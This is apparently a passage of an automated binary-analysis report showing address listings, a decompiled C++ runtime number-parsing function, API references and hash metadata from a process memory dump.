                                                                                                0x00f83903
                                                                                                0x00f837e5
                                                                                                0x00f837e5
                                                                                                0x00f837e7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f837e9
                                                                                                0x00f837f8
                                                                                                0x00000000
                                                                                                0x00f837f8
                                                                                                0x00f83764
                                                                                                0x00f83768
                                                                                                0x00f83768
                                                                                                0x00f83773
                                                                                                0x00000000
                                                                                                0x00f83775
                                                                                                0x00f83779
                                                                                                0x00f8377c
                                                                                                0x00f8377f
                                                                                                0x00f83788
                                                                                                0x00f83791
                                                                                                0x00f837da
                                                                                                0x00f837da
                                                                                                0x00f837dc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f837e0
                                                                                                0x00000000
                                                                                                0x00f837e0
                                                                                                0x00f83797
                                                                                                0x00f8379b
                                                                                                0x00f8379b
                                                                                                0x00f837a0
                                                                                                0x00f837a6
                                                                                                0x00f837bd
                                                                                                0x00f837bf
                                                                                                0x00f837cc
                                                                                                0x00f837cd
                                                                                                0x00f837d0
                                                                                                0x00f837d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f837a8
                                                                                                0x00f837ac
                                                                                                0x00f837b0
                                                                                                0x00f837b5
                                                                                                0x00f837b5
                                                                                                0x00f837bb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f837bb
                                                                                                0x00f837a6
                                                                                                0x00f83773
                                                                                                0x00f83737
                                                                                                0x00f83739
                                                                                                0x00f83739
                                                                                                0x00000000
                                                                                                0x00f83739
                                                                                                0x00f8372b
                                                                                                0x00000000
                                                                                                0x00f836d5
                                                                                                0x00f836d9
                                                                                                0x00f836dd
                                                                                                0x00f836dd
                                                                                                0x00f836e2
                                                                                                0x00f836e8
                                                                                                0x00f836ef
                                                                                                0x00f836f3
                                                                                                0x00f836f7
                                                                                                0x00f836fc
                                                                                                0x00f836fc
                                                                                                0x00f836ff
                                                                                                0x00f83702
                                                                                                0x00000000
                                                                                                0x00f83704
                                                                                                0x00f83704
                                                                                                0x00000000
                                                                                                0x00f83704
                                                                                                0x00f836ea
                                                                                                0x00f836ea
                                                                                                0x00f83707
                                                                                                0x00f8370c
                                                                                                0x00f8370f
                                                                                                0x00000000
                                                                                                0x00f8370f
                                                                                                0x00f836e8

                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00F83644
                                                                                                  • Part of subcall function 00F82295: __EH_prolog3.LIBCMT ref: 00F8229C
                                                                                                  • Part of subcall function 00F82295: std::_Lockit::_Lockit.LIBCPMT ref: 00F822A6
                                                                                                  • Part of subcall function 00F82295: std::_Lockit::~_Lockit.LIBCPMT ref: 00F82317
                                                                                                • _Find_elem.LIBCPMT ref: 00F83851
                                                                                                Strings
                                                                                                • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F836AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 2544715827-2799312399
                                                                                                • Opcode ID: 783182b077fdcaf955541bfdb2136ab8c40717918310be2a5504dcfd19d2a899
                                                                                                • Instruction ID: f89c1dbfc923e3f4d5a4ac24e898acdf4cd4ead7c90e182c85ccfd6bd26b8d77
                                                                                                • Opcode Fuzzy Hash: 783182b077fdcaf955541bfdb2136ab8c40717918310be2a5504dcfd19d2a899
                                                                                                • Instruction Fuzzy Hash: 0CC10671D082889EDF15FFA8C890BECBBB6AF01710F640059E4856F293D7749E46EB11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E00F89DCF(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t130;
                                                                                                				intOrPtr* _t136;
                                                                                                				void* _t146;
                                                                                                				intOrPtr* _t147;
                                                                                                				char* _t148;
                                                                                                				void* _t155;
                                                                                                				signed int _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t158;
                                                                                                				void* _t161;
                                                                                                				char* _t164;
                                                                                                				void* _t165;
                                                                                                				void* _t166;
                                                                                                				signed int _t177;
                                                                                                				signed int _t183;
                                                                                                				intOrPtr _t188;
                                                                                                				intOrPtr _t189;
                                                                                                				signed int _t208;
                                                                                                				signed int _t212;
                                                                                                				char _t220;
                                                                                                				void* _t231;
                                                                                                				intOrPtr _t232;
                                                                                                				intOrPtr _t233;
                                                                                                				signed int _t237;
                                                                                                				signed int _t238;
                                                                                                				char* _t242;
                                                                                                				signed int _t244;
                                                                                                				signed int _t246;
                                                                                                				void* _t247;
                                                                                                				void* _t248;
                                                                                                
                                                                                                				_t248 = __eflags;
                                                                                                				E00FB38E6(0xfb7511, __edi, __esi);
                                                                                                				_t188 =  *((intOrPtr*)(_t247 + 0x10));
                                                                                                				 *((intOrPtr*)(_t247 - 0x94)) =  *((intOrPtr*)(_t247 + 0xc));
                                                                                                				 *((intOrPtr*)(_t247 - 0x88)) =  *((intOrPtr*)(_t247 + 0x14));
                                                                                                				 *(_t247 - 0x80) =  *(_t247 + 0x1c);
                                                                                                				_t130 = E00F8782B(__edi, __esi, _t248,  *(_t247 + 0x1c));
                                                                                                				_t235 = _t130;
                                                                                                				_t240 =  *((intOrPtr*)( *_t130 + 0x14));
                                                                                                				 *0xfb81fc(_t247 - 0x78, 0x88);
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x14))))();
                                                                                                				 *(_t247 - 4) =  *(_t247 - 4) & 0x00000000;
                                                                                                				_t249 =  *((intOrPtr*)(_t247 - 0x68));
                                                                                                				if( *((intOrPtr*)(_t247 - 0x68)) != 0) {
                                                                                                					 *(_t247 - 0x90) = E00F8531F(_t235) & 0x0000ffff;
                                                                                                				} else {
                                                                                                					 *(_t247 - 0x90) =  *(_t247 - 0x90) & 0x00000000;
                                                                                                				}
                                                                                                				_t136 = E00F8709A(_t235, _t240, _t249,  *(_t247 - 0x80));
                                                                                                				 *0xfb81fc("0123456789ABCDEFabcdef-+Xx", 0xfb98db, _t247 - 0x48);
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x2c))))();
                                                                                                				_t242 =  *((intOrPtr*)(_t247 - 0x94));
                                                                                                				 *((intOrPtr*)(_t247 - 0x84)) = _t242;
                                                                                                				if(E00F861E6(_t188,  *((intOrPtr*)(_t247 - 0x88))) == 0) {
                                                                                                					L13:
                                                                                                					_t244 =  *(_t247 + 0x18) & 0x00000e00;
                                                                                                					_t237 = 0xa;
                                                                                                					 *(_t247 - 0x80) = _t237;
                                                                                                					if(_t244 != 0x400) {
                                                                                                						__eflags = _t244 - 0x800;
                                                                                                						if(_t244 != 0x800) {
                                                                                                							asm("sbb esi, esi");
                                                                                                							_t246 =  ~_t244 & _t237;
                                                                                                							__eflags = _t246;
                                                                                                							L19:
                                                                                                							 *((char*)(_t247 - 0x79)) = 0;
                                                                                                							 *((char*)(_t247 - 0x8c)) = 0;
                                                                                                							 *((char*)(_t247 - 0x7a)) = 0;
                                                                                                							E00F861E6(_t188,  *((intOrPtr*)(_t247 - 0x88)));
                                                                                                							if(0 == 0) {
                                                                                                								L35:
                                                                                                								__eflags = _t246;
                                                                                                								if(_t246 == 0) {
                                                                                                									L38:
                                                                                                									 *(_t247 - 0x50) =  *(_t247 - 0x50) & 0x00000000;
                                                                                                									 *((intOrPtr*)(_t247 - 0x4c)) = 0xf;
                                                                                                									 *(_t247 - 0x60) = 0;
                                                                                                									E00F72AB0(_t188, _t237, 1,  *((intOrPtr*)(_t247 - 0x8c)));
                                                                                                									_t238 = 0;
                                                                                                									 *(_t247 - 4) = 1;
                                                                                                									 *((intOrPtr*)(_t247 - 0x8c)) =  *((intOrPtr*)(_t247 - 0x94)) + 0x1f;
                                                                                                									_t146 = E00F861E6(_t188,  *((intOrPtr*)(_t247 - 0x88)));
                                                                                                									_pop(_t207);
                                                                                                									if(_t146 == 0) {
                                                                                                										_t208 =  *(_t247 - 0x60);
                                                                                                										_t189 =  *((intOrPtr*)(_t247 - 0x4c));
                                                                                                										L69:
                                                                                                										_t232 =  *((intOrPtr*)(_t247 - 0x79));
                                                                                                										L70:
                                                                                                										_t147 = _t247 - 0x78;
                                                                                                										if( *((intOrPtr*)(_t247 - 0x64)) >= 0x10) {
                                                                                                											_t147 =  *((intOrPtr*)(_t247 - 0x78));
                                                                                                										}
                                                                                                										if(_t232 == 0) {
                                                                                                											L87:
                                                                                                											_t148 =  *((intOrPtr*)(_t247 - 0x94));
                                                                                                											goto L88;
                                                                                                										} else {
                                                                                                											while(_t238 != 0) {
                                                                                                												_t233 =  *_t147;
                                                                                                												if(_t233 == 0x7f) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t238 = _t238 - 1;
                                                                                                												if(_t238 == 0) {
                                                                                                													L79:
                                                                                                													if(_t238 != 0) {
                                                                                                														L83:
                                                                                                														if( *((char*)(_t147 + 1)) > 0) {
                                                                                                															_t147 = _t147 + 1;
                                                                                                														}
                                                                                                														continue;
                                                                                                													}
                                                                                                													 *(_t247 - 0x80) = _t247 - 0x60;
                                                                                                													if( *((intOrPtr*)(_t247 - 0x4c)) >= 0x10) {
                                                                                                														 *(_t247 - 0x80) = _t208;
                                                                                                													}
                                                                                                													_t189 =  *((intOrPtr*)(_t247 - 0x4c));
                                                                                                													if(_t233 <  *( *(_t247 - 0x80))) {
                                                                                                														goto L87;
                                                                                                													} else {
                                                                                                														goto L83;
                                                                                                													}
                                                                                                												}
                                                                                                												 *(_t247 - 0x80) = _t247 - 0x60;
                                                                                                												_t212 =  *(_t247 - 0x60);
                                                                                                												if(_t189 >= 0x10) {
                                                                                                													_t189 =  *((intOrPtr*)(_t247 - 0x4c));
                                                                                                													 *(_t247 - 0x80) = _t212;
                                                                                                												}
                                                                                                												_t208 =  *(_t247 - 0x60);
                                                                                                												if(_t233 !=  *((intOrPtr*)( *(_t247 - 0x80) + _t238))) {
                                                                                                													goto L87;
                                                                                                												} else {
                                                                                                													goto L79;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags =  *((char*)(_t247 - 0x7a));
                                                                                                											_t148 =  *((intOrPtr*)(_t247 - 0x84));
                                                                                                											if( *((char*)(_t247 - 0x7a)) == 0) {
                                                                                                												 *_t148 = 0x30;
                                                                                                												_t148 = _t148 + 1;
                                                                                                											}
                                                                                                											L88:
                                                                                                											 *_t148 = 0;
                                                                                                											E00F72570(_t247 - 0x60, _t238);
                                                                                                											E00F72570(_t247 - 0x78, _t238);
                                                                                                											return E00FB38A1(_t246, _t238, _t246);
                                                                                                										}
                                                                                                									} else {
                                                                                                										goto L39;
                                                                                                									}
                                                                                                									do {
                                                                                                										L39:
                                                                                                										if( *((char*)(_t188 + 4)) == 0) {
                                                                                                											_t207 = _t188;
                                                                                                											E00F8CB85(_t188);
                                                                                                										}
                                                                                                										_t155 = E00F8622A(_t207, _t247 - 0x48,  *(_t188 + 6) & 0x0000ffff);
                                                                                                										if(_t155 >=  *(_t247 - 0x80)) {
                                                                                                											__eflags =  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
                                                                                                											_t156 = _t247 - 0x60;
                                                                                                											_t208 =  *(_t247 - 0x60);
                                                                                                											if( *((intOrPtr*)(_t247 - 0x4c)) >= 0x10) {
                                                                                                												_t156 = _t208;
                                                                                                											}
                                                                                                											__eflags =  *((char*)(_t156 + _t238));
                                                                                                											if( *((char*)(_t156 + _t238)) == 0) {
                                                                                                												L62:
                                                                                                												_t189 =  *((intOrPtr*)(_t247 - 0x4c));
                                                                                                												if(_t238 == 0) {
                                                                                                													goto L69;
                                                                                                												}
                                                                                                												_t157 = _t247 - 0x60;
                                                                                                												if(_t189 >= 0x10) {
                                                                                                													_t157 = _t208;
                                                                                                												}
                                                                                                												if( *((char*)(_t157 + _t238)) <= 0) {
                                                                                                													_t232 = 0;
                                                                                                													goto L70;
                                                                                                												} else {
                                                                                                													_t238 = _t238 + 1;
                                                                                                													goto L69;
                                                                                                												}
                                                                                                											} else {
                                                                                                												__eflags =  *(_t247 - 0x90);
                                                                                                												if( *(_t247 - 0x90) == 0) {
                                                                                                													goto L62;
                                                                                                												}
                                                                                                												__eflags =  *((char*)(_t188 + 4));
                                                                                                												_t158 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                												if( *((char*)(_t188 + 4)) == 0) {
                                                                                                													E00F8CB85(_t188);
                                                                                                													_t158 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                													_t208 =  *(_t247 - 0x60);
                                                                                                												}
                                                                                                												__eflags = _t158 -  *(_t247 - 0x90);
                                                                                                												if(_t158 !=  *(_t247 - 0x90)) {
                                                                                                													goto L62;
                                                                                                												} else {
                                                                                                													_push(0);
                                                                                                													E00F7F5B0(_t188, _t247 - 0x60, _t231, _t238);
                                                                                                													_t238 = _t238 + 1;
                                                                                                													__eflags = _t238;
                                                                                                													goto L60;
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t220 =  *((intOrPtr*)(_t155 + "0123456789ABCDEFabcdef-+Xx"));
                                                                                                											_t164 =  *((intOrPtr*)(_t247 - 0x84));
                                                                                                											 *_t164 = _t220;
                                                                                                											if( *((char*)(_t247 - 0x7a)) != 0 || _t220 != 0x30) {
                                                                                                												if(_t164 <  *((intOrPtr*)(_t247 - 0x8c))) {
                                                                                                													 *((char*)(_t247 - 0x7a)) = 1;
                                                                                                													 *((intOrPtr*)(_t247 - 0x84)) = _t164 + 1;
                                                                                                												}
                                                                                                											}
                                                                                                											_t165 = _t247 - 0x60;
                                                                                                											 *((char*)(_t247 - 0x79)) = 1;
                                                                                                											if( *((intOrPtr*)(_t247 - 0x4c)) >= 0x10) {
                                                                                                												_t165 =  *(_t247 - 0x60);
                                                                                                											}
                                                                                                											if( *((char*)(_t165 + _t238)) != 0x7f) {
                                                                                                												_t166 = _t247 - 0x60;
                                                                                                												if( *((intOrPtr*)(_t247 - 0x4c)) >= 0x10) {
                                                                                                													_t166 =  *(_t247 - 0x60);
                                                                                                												}
                                                                                                												 *((char*)(_t166 + _t238)) =  *((char*)(_t166 + _t238)) + 1;
                                                                                                											}
                                                                                                										}
                                                                                                										L60:
                                                                                                										E00F8BA54(_t188);
                                                                                                										_t161 = E00F861E6(_t188,  *((intOrPtr*)(_t247 - 0x88)));
                                                                                                										_pop(_t207);
                                                                                                									} while (_t161 != 0);
                                                                                                									_t208 =  *(_t247 - 0x60);
                                                                                                									goto L62;
                                                                                                								}
                                                                                                								L36:
                                                                                                								__eflags = _t246 - _t237;
                                                                                                								if(_t246 == _t237) {
                                                                                                									goto L38;
                                                                                                								}
                                                                                                								L37:
                                                                                                								 *(_t247 - 0x80) = ((0 | _t246 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
                                                                                                								goto L38;
                                                                                                							}
                                                                                                							if( *((char*)(_t188 + 4)) == 0) {
                                                                                                								E00F8CB85(_t188);
                                                                                                							}
                                                                                                							if(( *(_t188 + 6) & 0x0000ffff) !=  *((intOrPtr*)(_t247 - 0x48))) {
                                                                                                								goto L35;
                                                                                                							} else {
                                                                                                								 *((char*)(_t247 - 0x79)) = 1;
                                                                                                								 *((char*)(_t247 - 0x8c)) = 1;
                                                                                                								E00F8BA54(_t188);
                                                                                                								E00F861E6(_t188,  *((intOrPtr*)(_t247 - 0x88)));
                                                                                                								if(1 == 0) {
                                                                                                									L33:
                                                                                                									__eflags = _t246;
                                                                                                									if(_t246 != 0) {
                                                                                                										goto L36;
                                                                                                									}
                                                                                                									_t246 = 8;
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								if( *((char*)(_t188 + 4)) == 0) {
                                                                                                									E00F8CB85(_t188);
                                                                                                								}
                                                                                                								_t177 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                								if(_t177 ==  *((intOrPtr*)(_t247 - 0x16))) {
                                                                                                									L30:
                                                                                                									if(_t246 == 0 || _t246 == 0x10) {
                                                                                                										_t246 = 0x10;
                                                                                                										 *((char*)(_t247 - 0x79)) = 0;
                                                                                                										 *((char*)(_t247 - 0x8c)) = 0;
                                                                                                										E00F8BA54(_t188);
                                                                                                										goto L37;
                                                                                                									} else {
                                                                                                										goto L33;
                                                                                                									}
                                                                                                								} else {
                                                                                                									if( *((char*)(_t188 + 4)) == 0) {
                                                                                                										E00F8CB85(_t188);
                                                                                                										_t177 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                									}
                                                                                                									if(_t177 !=  *((intOrPtr*)(_t247 - 0x18))) {
                                                                                                										goto L33;
                                                                                                									} else {
                                                                                                										goto L30;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_push(0x10);
                                                                                                						L17:
                                                                                                						_pop(_t246);
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					_push(8);
                                                                                                					goto L17;
                                                                                                				} else {
                                                                                                					if( *((char*)(_t188 + 4)) == 0) {
                                                                                                						E00F8CB85(_t188);
                                                                                                					}
                                                                                                					_t183 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                					if(_t183 !=  *((intOrPtr*)(_t247 - 0x1a))) {
                                                                                                						__eflags =  *((char*)(_t188 + 4));
                                                                                                						if( *((char*)(_t188 + 4)) == 0) {
                                                                                                							E00F8CB85(_t188);
                                                                                                							_t183 =  *(_t188 + 6) & 0x0000ffff;
                                                                                                						}
                                                                                                						__eflags = _t183 -  *((intOrPtr*)(_t247 - 0x1c));
                                                                                                						if(_t183 !=  *((intOrPtr*)(_t247 - 0x1c))) {
                                                                                                							goto L13;
                                                                                                						} else {
                                                                                                							 *_t242 = 0x2d;
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *_t242 = 0x2b;
                                                                                                						L12:
                                                                                                						 *((intOrPtr*)(_t247 - 0x84)) = _t242 + 1;
                                                                                                						E00F8BA54(_t188);
                                                                                                						goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                			}

































                                                                                                0x00f89dcf
                                                                                                0x00f89dd9
                                                                                                0x00f89de1
                                                                                                0x00f89de4
                                                                                                0x00f89ded
                                                                                                0x00f89df7
                                                                                                0x00f89dfa
                                                                                                0x00f89dff
                                                                                                0x00f89e08
                                                                                                0x00f89e0d
                                                                                                0x00f89e15
                                                                                                0x00f89e17
                                                                                                0x00f89e1b
                                                                                                0x00f89e1f
                                                                                                0x00f89e34
                                                                                                0x00f89e21
                                                                                                0x00f89e21
                                                                                                0x00f89e21
                                                                                                0x00f89e3d
                                                                                                0x00f89e5a
                                                                                                0x00f89e62
                                                                                                0x00f89e6a
                                                                                                0x00f89e71
                                                                                                0x00f89e80
                                                                                                0x00f89ec8
                                                                                                0x00f89ecd
                                                                                                0x00f89ed3
                                                                                                0x00f89ed4
                                                                                                0x00f89edd
                                                                                                0x00f89ee3
                                                                                                0x00f89ee9
                                                                                                0x00f89ef2
                                                                                                0x00f89ef4
                                                                                                0x00f89ef4
                                                                                                0x00f89ef6
                                                                                                0x00f89eff
                                                                                                0x00f89f02
                                                                                                0x00f89f08
                                                                                                0x00f89f0b
                                                                                                0x00f89f14
                                                                                                0x00f89faa
                                                                                                0x00f89faa
                                                                                                0x00f89fac
                                                                                                0x00f89fc4
                                                                                                0x00f89fca
                                                                                                0x00f89fd3
                                                                                                0x00f89fda
                                                                                                0x00f89fde
                                                                                                0x00f89fe9
                                                                                                0x00f89ff4
                                                                                                0x00f89ff9
                                                                                                0x00f89fff
                                                                                                0x00f8a005
                                                                                                0x00f8a008
                                                                                                0x00f8a10b
                                                                                                0x00f8a10e
                                                                                                0x00f8a111
                                                                                                0x00f8a111
                                                                                                0x00f8a114
                                                                                                0x00f8a118
                                                                                                0x00f8a11b
                                                                                                0x00f8a11d
                                                                                                0x00f8a11d
                                                                                                0x00f8a122
                                                                                                0x00f8a18b
                                                                                                0x00f8a18b
                                                                                                0x00000000
                                                                                                0x00f8a124
                                                                                                0x00f8a124
                                                                                                0x00f8a128
                                                                                                0x00f8a12d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a12f
                                                                                                0x00f8a132
                                                                                                0x00f8a153
                                                                                                0x00f8a155
                                                                                                0x00f8a170
                                                                                                0x00f8a174
                                                                                                0x00f8a176
                                                                                                0x00f8a176
                                                                                                0x00000000
                                                                                                0x00f8a174
                                                                                                0x00f8a15e
                                                                                                0x00f8a161
                                                                                                0x00f8a163
                                                                                                0x00f8a163
                                                                                                0x00f8a16b
                                                                                                0x00f8a16e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a16e
                                                                                                0x00f8a137
                                                                                                0x00f8a13a
                                                                                                0x00f8a140
                                                                                                0x00f8a142
                                                                                                0x00f8a145
                                                                                                0x00f8a145
                                                                                                0x00f8a14e
                                                                                                0x00f8a151
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a151
                                                                                                0x00f8a179
                                                                                                0x00f8a17d
                                                                                                0x00f8a183
                                                                                                0x00f8a185
                                                                                                0x00f8a188
                                                                                                0x00f8a188
                                                                                                0x00f8a191
                                                                                                0x00f8a194
                                                                                                0x00f8a197
                                                                                                0x00f8a19f
                                                                                                0x00f8a1ab
                                                                                                0x00f8a1ab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a00e
                                                                                                0x00f8a00e
                                                                                                0x00f8a012
                                                                                                0x00f8a014
                                                                                                0x00f8a016
                                                                                                0x00f8a016
                                                                                                0x00f8a024
                                                                                                0x00f8a02e
                                                                                                0x00f8a083
                                                                                                0x00f8a087
                                                                                                0x00f8a08a
                                                                                                0x00f8a08d
                                                                                                0x00f8a08f
                                                                                                0x00f8a08f
                                                                                                0x00f8a091
                                                                                                0x00f8a095
                                                                                                0x00f8a0ed
                                                                                                0x00f8a0ed
                                                                                                0x00f8a0f2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a0f4
                                                                                                0x00f8a0fa
                                                                                                0x00f8a0fc
                                                                                                0x00f8a0fc
                                                                                                0x00f8a102
                                                                                                0x00f8a107
                                                                                                0x00000000
                                                                                                0x00f8a104
                                                                                                0x00f8a104
                                                                                                0x00000000
                                                                                                0x00f8a104
                                                                                                0x00f8a097
                                                                                                0x00f8a097
                                                                                                0x00f8a09f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f8a0a1
                                                                                                0x00f8a0a5
                                                                                                0x00f8a0a9
                                                                                                0x00f8a0ad
                                                                                                0x00f8a0b2
                                                                                                0x00f8a0b6
                                                                                                0x00f8a0b6
                                                                                                0x00f8a0b9
                                                                                                0x00f8a0c0
                                                                                                0x00000000
                                                                                                0x00f8a0c2
                                                                                                0x00f8a0c2
                                                                                                0x00f8a0c7
                                                                                                0x00f8a0cc
                                                                                                0x00f8a0cc
                                                                                                0x00000000
                                                                                                0x00f8a0cc
                                                                                                0x00f8a0c0
                                                                                                0x00f8a030
                                                                                                0x00f8a034
                                                                                                0x00f8a03a
                                                                                                0x00f8a040
                                                                                                0x00f8a042
                                                                                                0x00f8a04f
                                                                                                0x00f8a052
                                                                                                0x00f8a056
                                                                                                0x00f8a056
                                                                                                0x00f8a04f
                                                                                                0x00f8a060
                                                                                                0x00f8a063
                                                                                                0x00f8a067
                                                                                                0x00f8a069
                                                                                                0x00f8a069
                                                                                                0x00f8a070
                                                                                                0x00f8a076
                                                                                                0x00f8a079
                                                                                                0x00f8a07b
                                                                                                0x00f8a07b
                                                                                                0x00f8a07e
                                                                                                0x00f8a07e
                                                                                                0x00f8a070
                                                                                                0x00f8a0cd
                                                                                                0x00f8a0cf
                                                                                                0x00f8a0db
                                                                                                0x00f8a0e1
                                                                                                0x00f8a0e2
                                                                                                0x00f8a0ea
                                                                                                0x00000000
                                                                                                0x00f8a0ea
                                                                                                0x00f89fae
                                                                                                0x00f89fae
                                                                                                0x00f89fb0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f89fb2
                                                                                                0x00f89fc1
                                                                                                0x00000000
                                                                                                0x00f89fc1
                                                                                                0x00f89f1e
                                                                                                0x00f89f22
                                                                                                0x00f89f22
                                                                                                0x00f89f2f
                                                                                                0x00000000
                                                                                                0x00f89f31
                                                                                                0x00f89f35
                                                                                                0x00f89f38
                                                                                                0x00f89f3e
                                                                                                0x00f89f4a
                                                                                                0x00f89f53
                                                                                                0x00f89fa3
                                                                                                0x00f89fa3
                                                                                                0x00f89fa5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f89fa9
                                                                                                0x00000000
                                                                                                0x00f89fa9
                                                                                                0x00f89f59
                                                                                                0x00f89f5d
                                                                                                0x00f89f5d
                                                                                                0x00f89f62
                                                                                                0x00f89f6a
                                                                                                0x00f89f83
                                                                                                0x00f89f85
                                                                                                0x00f89f92
                                                                                                0x00f89f93
                                                                                                0x00f89f96
                                                                                                0x00f89f9c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f89f6c
                                                                                                0x00f89f70
                                                                                                0x00f89f74
                                                                                                0x00f89f79
                                                                                                0x00f89f79
                                                                                                0x00f89f81
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f89f81
                                                                                                0x00f89f6a
                                                                                                0x00f89f2f
                                                                                                0x00f89eeb
                                                                                                0x00f89eed
                                                                                                0x00f89eed
                                                                                                0x00000000
                                                                                                0x00f89eed
                                                                                                0x00f89edf
                                                                                                0x00000000
                                                                                                0x00f89e82
                                                                                                0x00f89e86
                                                                                                0x00f89e8a
                                                                                                0x00f89e8a
                                                                                                0x00f89e8f
                                                                                                0x00f89e97
                                                                                                0x00f89e9e
                                                                                                0x00f89ea2
                                                                                                0x00f89ea6
                                                                                                0x00f89eab
                                                                                                0x00f89eab
                                                                                                0x00f89eaf
                                                                                                0x00f89eb3
                                                                                                0x00000000
                                                                                                0x00f89eb5
                                                                                                0x00f89eb5
                                                                                                0x00000000
                                                                                                0x00f89eb5
                                                                                                0x00f89e99
                                                                                                0x00f89e99
                                                                                                0x00f89eb8
                                                                                                0x00f89ebd
                                                                                                0x00f89ec3
                                                                                                0x00000000
                                                                                                0x00f89ec3
                                                                                                0x00f89e97

                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00F89DD9
                                                                                                  • Part of subcall function 00F8782B: __EH_prolog3.LIBCMT ref: 00F87832
                                                                                                  • Part of subcall function 00F8782B: std::_Lockit::_Lockit.LIBCPMT ref: 00F8783C
                                                                                                  • Part of subcall function 00F8782B: std::_Lockit::~_Lockit.LIBCPMT ref: 00F878AD
                                                                                                • _Find_elem.LIBCPMT ref: 00F8A024
                                                                                                Strings
                                                                                                • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F89E50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 2544715827-2799312399
                                                                                                • Opcode ID: 89111931b3ed537ec64a6f702fe5feb8fdb008c747be4237ea7081d8acddf135
                                                                                                • Instruction ID: 9de79d4e2710ac7998ba677bf3917a755a93444b0895cdaf45dcbedb93780ad3
                                                                                                • Opcode Fuzzy Hash: 89111931b3ed537ec64a6f702fe5feb8fdb008c747be4237ea7081d8acddf135
                                                                                                • Instruction Fuzzy Hash: B8C1A531D086588AEF25EF64C8857FCBBB2FF01314F48409AE445AB282DB758D85EB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00FA4A6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
